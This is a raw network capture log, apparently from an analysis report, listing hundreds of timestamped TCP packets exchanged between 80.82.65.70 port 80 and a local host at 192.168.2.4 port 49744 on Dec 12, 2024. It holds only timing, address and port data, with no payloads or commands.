                                        Dec 12, 2024 23:09:06.845977068 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.846018076 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.846729994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.846786976 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.846848965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.846898079 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.847588062 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.847624063 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.847655058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.847686052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.848457098 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.848495007 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.848563910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.848601103 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.849438906 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.849493980 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.849523067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.849555016 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.850184917 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.850222111 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.850364923 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.850403070 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.851048946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.851085901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.851138115 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.851174116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.851902962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.851960897 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.851995945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.852022886 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.852736950 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.852801085 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.852855921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.852890968 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.853612900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.853655100 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.853667974 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.853705883 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.854455948 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.854494095 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.854553938 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.854603052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.855324030 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.855364084 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.855453968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.855490923 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.856175900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.856213093 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.856276989 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.856311083 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.857033968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.857072115 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.857120037 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.857158899 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.857939959 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.857981920 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.858047009 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.858087063 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.858777046 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.858819008 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.858896971 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.858938932 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.859597921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.859641075 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.859728098 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.859766960 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.860488892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.860543013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.860579967 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.860750914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.861320019 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.861363888 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.861444950 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.861484051 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.862236977 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.862274885 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.862308025 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.862349033 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.863040924 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.863074064 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.863109112 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.863147974 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.908335924 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.908401966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.908435106 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.908586979 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.908638954 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.908763885 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.908858061 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.908926010 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.908972025 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.909634113 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.909681082 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.909749031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.909790993 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.910501957 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.910552025 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.910639048 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.910687923 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.911353111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.911401987 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.911470890 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.911514997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.912256002 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.912297964 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.912334919 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.912389994 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.913072109 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.913122892 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.913243055 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.913279057 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.913928986 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.914000988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.914001942 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.914036036 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.914860964 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.914906979 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.914925098 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.914964914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.915630102 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.915679932 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.915740013 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.915782928 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.916506052 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.916552067 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.916671991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.916717052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.917386055 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.917427063 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.917454958 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.917491913 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.918203115 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.918265104 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.918308020 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.919084072 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.919174910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.919265985 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.919348001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.919928074 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.919975042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.920007944 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.920049906 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.920814991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.920883894 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.920912027 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.920965910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.921611071 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.921647072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.921724081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.921812057 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.922485113 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.922540903 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.922571898 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.922611952 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.923376083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.923422098 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.923456907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.923491001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.924280882 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.924329042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.924360037 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.924418926 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.925081968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.925124884 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.925172091 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.925214052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.925913095 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.926024914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.926062107 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.926100969 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.926815987 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.926862955 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.926898956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.926944017 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.927649975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.927717924 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.927788973 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.927829981 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.928549051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.928595066 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.928620100 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.928661108 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.929371119 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.929425955 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.929491043 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.929538012 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.930208921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.930253029 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.033112049 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.033200026 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.033271074 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.033515930 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.033576012 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.033727884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.033773899 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.034423113 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.034465075 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.034511089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.034550905 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.035233021 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.035278082 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.035296917 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.035334110 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.036109924 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.036159039 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.036192894 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.036226034 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.036951065 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.037100077 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.037142992 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.037832975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.037867069 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.037993908 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.038028002 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.038719893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.038781881 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.038846970 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.039570093 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.039613008 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.039624929 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.039664984 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.040385008 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.040447950 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.040493965 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.041313887 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.041378021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.041399956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.041485071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.042150021 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.042169094 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.042210102 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.042943001 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.042989016 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.043072939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.043128014 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.043812037 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.043853045 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.043951988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.043988943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.044770956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.044826984 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.044862032 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.045578003 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.045633078 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.045666933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.045700073 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.046462059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.046520948 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.046540022 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.046586037 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.047323942 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.047375917 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.047390938 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.047425985 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.048269033 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.048317909 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.048484087 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.048521996 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.049170017 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.049257040 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.049288034 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.049351931 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.050018072 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.050038099 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.050064087 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.050098896 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.050725937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.050790071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.050859928 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.050909042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.051548004 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.051597118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.051630020 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.051666021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.052364111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.053704023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.074759960 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.074815989 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.074883938 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.074922085 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.074959040 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.075079918 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.075129032 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.075834990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.075876951 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.075932980 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.076000929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.076673985 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.076808929 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.076858997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.100425959 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.100590944 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.100663900 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.100831985 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.100884914 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.100923061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.100967884 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.101661921 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.101751089 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.101772070 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.101809978 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.102519035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.102560997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.102629900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.102668047 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.103899002 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.103943110 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.103964090 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.104005098 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.104187965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.104317904 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.104363918 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.105063915 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.105201960 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.105246067 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.105937958 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.105979919 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.106048107 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.106173038 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.106779099 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.106873989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.106908083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.106982946 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.107696056 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.107750893 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.107822895 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.107882977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.108508110 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.108558893 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.108623981 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.108715057 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.109370947 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.109430075 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.109464884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.109539032 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.110296011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.110359907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.110362053 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.110395908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.111160994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.111237049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.111253023 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.111288071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.112168074 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.112209082 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.112241983 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.112288952 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.112803936 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.112845898 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.112966061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.113008022 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.113670111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.113769054 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.113805056 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.114542961 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.114588976 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.114658117 CET804974480.82.65.70192.168.2.4
